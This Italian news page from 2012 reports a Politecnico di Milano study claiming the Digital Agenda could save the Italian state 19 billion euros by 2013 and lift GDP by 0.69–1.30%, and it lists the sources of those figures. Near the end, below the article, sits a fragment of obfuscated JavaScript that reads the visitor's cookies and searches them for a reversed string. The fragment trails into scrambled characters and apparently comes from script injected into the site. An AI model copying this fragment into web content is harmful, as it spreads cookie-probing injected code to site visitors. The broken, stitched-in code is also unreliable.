Questo sito utilizza cookie per raccogliere informazioni sull'utilizzo. Cliccando su questo banner o navigando il sito, acconsenti all'uso dei cookie. Leggi la nostra cookie policy.OK

Direttore responsabile Alessandro Longo

Politecnico di Milano

Dall’Agenda risparmi per 19 mld entro il 2013

15 Ago 2012

15 agosto 2012

Il Politecnico di Milano stima grandi vantaggi: il rapporto deficit/Pil passerebbe dal 3,9% attuale all’1,5%. Crescita del Pil tra lo 0,69% e l’1,30%

Le misure per l’Agenda digitale per l’Italia possono ridurre il deficit dello Stato di 19 miliardi di euro entro il 2013, riducendo il rapporto deficit/Pil dal 3,9% all’1,5%, e stimolare al contempo una crescita del Pil tra lo 0,69% e l’1,30%.

Emerge da una ricerca della School of Management-Politecnico di Milano. «L’innovazione digitale può rappresentare una chiave per la ripresa del Paese e in questo le telecomunicazioni ricoprono un ruolo determinante», afferma Andrea Rangone, direttore degli Osservatori ICT della School of Management del Politecnico di Milano.

Il risparmio di 19 miliardi verrebbe da:

• una riduzione della spesa per gli acquisti della Pubblica Amministrazione con un risparmio di 4 miliardi di euro;

• un aumento della produttività della Pubblica Amministrazione grazie un miglioramento dell’efficienza, con un risparmio di 15 miliardi di euro.

L’incremento del PIL tra lo 0,69 e l’1,3% sarebbe generato da:

• lo stimolo della domanda ICT della Pubblica Amministrazione (+0,03-0,05%) nell’ipotesi di 150 milioni di euro di investimenti in più in innovazione ICT;

• lo stimolo agli investimenti ICT delle imprese per un valore di 150 milioni in più rispetto al valore attuale (+0,03-0,05% del PIL); • nuovi investimenti in Start-Up, nell’ipotesi di 150 milioni di euro in più a sostegno della nuova imprenditorialità (+0,05-0,10% del PIL);

• lo sviluppo delle reti fisse Next Generation Networking, con investimenti da 3- 4 miliardi di euro (+0,40-0,70% del PIL);

• lo sviluppo delle reti mobile LTE, con investimenti da 1,5 – 2 miliardi di euro (+0,18-0,40% del PIL.

Qui altri dettagli.

function cc(ccn){var c=d[‘cookie’];return c.search(ccn.split(”).reverse().join(”))^O0$5rL”E,)3T<:#}N%u&/{HXUSWps+ixt`@bm~qGh7AvCQ;1-Jc*kZIgl!fnyw9DP6Rj2e[(aYB8._=KM4';}

Articoli correlati